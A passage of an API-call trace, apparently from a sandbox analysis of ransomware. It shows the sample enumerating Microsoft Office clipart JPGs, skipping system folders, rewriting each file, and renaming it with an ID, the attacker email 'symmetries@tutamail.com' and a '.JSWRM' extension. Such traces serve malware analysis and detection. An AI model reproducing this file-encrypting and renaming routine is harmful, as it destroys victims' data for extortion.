lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.739] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=51978) returned 1 [0090.739] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcb00) returned 0x24d210 [0090.739] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xcb00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xcb00, lpOverlapped=0x0) returned 1 [0090.744] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.744] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xcb00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xcb00, lpOverlapped=0x0) returned 1 [0090.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.745] CloseHandle (hObject=0x314) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0090.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0090.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0090.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0090.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0090.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0090.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0090.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0090.745] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387337.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387337.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0090.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0090.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0090.746] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0387578.JPG", cAlternateFileName="")) returned 1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2=".") returned 1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="..") returned 1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="...") returned 1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="windows") returned -1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="recovery") returned -1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="perflogs") returned -1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="documents and settings") returned 1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="system volume information") returned -1 [0090.746] lstrcmpiW (lpString1="J0387578.JPG", lpString2="msocache") returned -1 [0090.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0090.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387578.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387578.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387578.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0090.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0090.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387578.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387578.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387578.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0090.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0090.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0090.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0090.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387578.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.747] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27884) returned 1 [0090.747] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6ce0) returned 0x24d210 [0090.748] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6ce0, lpOverlapped=0x0) returned 1 [0090.751] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.751] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6ce0, lpOverlapped=0x0) returned 1 [0090.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.752] CloseHandle (hObject=0x314) returned 1 [0090.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0090.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0090.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0090.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0090.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0090.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0090.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.753] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387578.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387578.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0090.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0090.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0090.753] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x98c7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0387591.JPG", cAlternateFileName="")) returned 1 [0090.753] lstrcmpiW (lpString1="J0387591.JPG", lpString2=".") returned 1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="..") returned 1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="...") returned 1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="windows") returned -1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="recovery") returned -1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="perflogs") returned -1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="documents and settings") returned 1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="system volume information") returned -1 [0090.754] lstrcmpiW (lpString1="J0387591.JPG", lpString2="msocache") returned -1 [0090.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0090.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387591.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387591.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387591.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0090.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0090.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387591.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387591.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387591.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0090.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0090.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0090.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0090.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387591.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.755] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39111) returned 1 [0090.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x98c0) returned 0x24d210 [0090.755] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x98c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x98c0, lpOverlapped=0x0) returned 1 [0091.074] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.074] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x98c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x98c0, lpOverlapped=0x0) returned 1 [0091.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.075] CloseHandle (hObject=0x314) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0091.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0091.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0091.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0091.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0091.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.076] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387591.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387591.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0091.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0091.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0091.077] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb9bf, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0387604.JPG", cAlternateFileName="")) returned 1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2=".") returned 1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="..") returned 1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="...") returned 1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="windows") returned -1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="recovery") returned -1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="perflogs") returned -1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="documents and settings") returned 1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="$RECYCLE.BIN") returned 1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="system volume information") returned -1 [0091.077] lstrcmpiW (lpString1="J0387604.JPG", lpString2="msocache") returned -1 [0091.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0091.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387604.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387604.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387604.JPG", lpUsedDefaultChar=0x0) returned 12 [0091.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0091.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387604.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0387604.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0387604.JPG", lpUsedDefaultChar=0x0) returned 12 [0091.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0091.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387604.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.078] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47551) returned 1 [0091.079] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb9b0) returned 0x24d210 [0091.080] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb9b0, lpOverlapped=0x0) returned 1 [0091.084] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.085] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb9b0, lpOverlapped=0x0) returned 1 [0091.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.086] CloseHandle (hObject=0x314) returned 1 [0091.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 